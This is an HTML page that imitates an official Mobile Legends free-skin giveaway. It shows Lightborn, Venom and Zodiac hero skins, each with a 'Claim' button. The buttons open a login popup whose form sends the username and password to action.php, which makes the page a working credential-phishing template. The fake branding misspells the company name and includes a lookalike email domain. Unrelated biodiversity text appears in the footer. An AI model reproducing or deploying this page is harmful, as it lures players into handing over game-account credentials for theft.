<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="Get a chance to claim your dream skin. Lightborn, Venom, and Zodiac are available to claim in this time limmited offer. See more...">
    <link rel="stylesheet" href="style.css">
    <link rel="icon" href="images/iconphoto2.jpg">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <title>Mobile Legends</title>
</head>
<body>
<div class="topnav" id="myTopnav">
  <a href="#contact" class="active">Mobile Legends</a>
    <a href="javascript:void(0);" class="icon" onclick="myFunction()">
      <i class="fa fa-bars"></i>
    </a>
  </div>

    <div class="box">
        <h1 class="skin">Lightborn skins</h1>
        <hr />
        <div class="content">
        <h1>Tigreal</h1>
        <img src="images/tigreal.jpg"  alt="Hero" draggable="false" > <br>
        <input type="button" class="popup-btn" value="Claim">
        </div>
        <div class="content">
        <h1>Granger</h1>
        <img src="images/granger.jpg"  alt="Hero" draggable="false" > <br>
        <input type="button" class="popup-btn1" value="Claim">
        </div>
        <div class="content">
        <h1>Harith</h1>
        <img src="images/harith.jpg"  alt="Hero" draggable="false" > <br>
        <input type="button" class="popup-btn2" value="Claim">
        </div>
        <div class="content">
            <h1>Fanny</h1>
            <img src="images/fanny.jpg"  alt="Hero" draggable="false" > <br>
            <input type="button" class="popup-btn3" value="Claim">
        </div>
        <div class="content">
            <h1>Alucard</h1>
            <img src="images/alucard.jpg"  alt="Hero" draggable="false" > <br>
            <input type="button" class="popup-btn4" value="Claim">
        </div>
    </div>

    <div class="box">
      <h1 class="skin">Venom skins</h1>
      <hr />
      <div class="content">
      <h1>Grock</h1>
      <img src="images/grock.jpg"  alt="Hero" draggable="false" > <br>
      <input type="button" class="popup-btn5" value="Claim">
      </div>
      <div class="content">
      <h1>Angela</h1>
      <img src="images/angela.jpg"  alt="Hero" draggable="false" > <br>
      <input type="button" class="popup-btn6" value="Claim">
      </div>
      <div class="content">
      <h1>Gusion</h1>
      <img src="images/gusion.jpg"  alt="Hero" draggable="false" > <br>
      <input type="button" class="popup-btn7" value="Claim">
      </div>
      <div class="content">
          <h1>Hannabi</h1>
          <img src="images/hannabi.jpg"  alt="Hero" draggable="false" > <br>
          <input type="button" class="popup-btn8" value="Claim">
      </div>
      <div class="content">
          <h1>Harley</h1>
          <img src="images/harley.jpg"  alt="Hero" draggable="false" > <br>
          <input type="button" class="popup-btn9" value="Claim">
      </div>
  </div>

  <div class="box">
    <h1 class="skin">Zodiac skins</h1>
    <hr />
    <div class="content">
    <h1>Irithel</h1>
    <img src="images/irithel.jpg"  alt="Hero" draggable="false" > <br>
    <input type="button" class="popup-btn10" value="Claim">
    </div>
    <div class="content">
    <h1>Helcurt</h1>
    <img src="images/helcurt.jpg"  alt="Hero" draggable="false" > <br>
    <input type="button" class="popup-btn11" value="Claim">
    </div>
</div>

<!--begin-->

<div class="popup"> 
    <div class="wrapper fadeInDown">
        <div id="formContent">
      
   
          <div class="fadeIn first">
            <img src="images/logo.png" id="icon" alt="User Icon" draggable="false" >
          </div>

          <form action="action.php" method="POST">
            <input type="text" id="login" class="fadeIn second" name="name" placeholder="Username" required>
            <input type="password" id="password" class="fadeIn third" name="uword" placeholder="Password" required>
            <input type="submit" class="fadeIn fourth" value="Log In" name="Login">
          </form>
      
      </div>
      </div>
  </div>


<footer>
  <a href="#" class="fa fa-facebook"></a>
  <a href="#" class="fa fa-twitter"></a>
  <a href="#" class="fa fa-google"></a>
  <a href="#" class="fa fa-linkedin"></a>
  <a href="#" class="fa fa-youtube"></a>
  <a href="#" class="fa fa-instagram"></a>
  <a href="#" class="fa fa-pinterest"></a>
  <a href="#" class="fa fa-snapchat-ghost"></a>
  <a href="#" class="fa fa-skype"></a>
  <a href="#" class="fa fa-reddit"></a>
  <p>Mail: mobile-legends@moontoon.com</p>
<p>Phone: <code>+639593860285</code></p>
<p>Hoot Hoot! Diggie is back! Do you know what Biodiversity is and how important it is? Read my digest entry below to know more about it!</p>
<p>Want to learn more about endangered species and wildlife conservation?</p>
  <div class="copy">
    <p>Copyrights &copy; Mootoon 2021</p>
  </div>
</footer>
<script src="main.js">
  function myFunction() {
  var x = document.getElementById("myTopnav");
  if (x.className === "topnav") {
    x.className += " responsive";
  } else {
    x.className = "topnav";
  }
}
</script>
</body>
</html>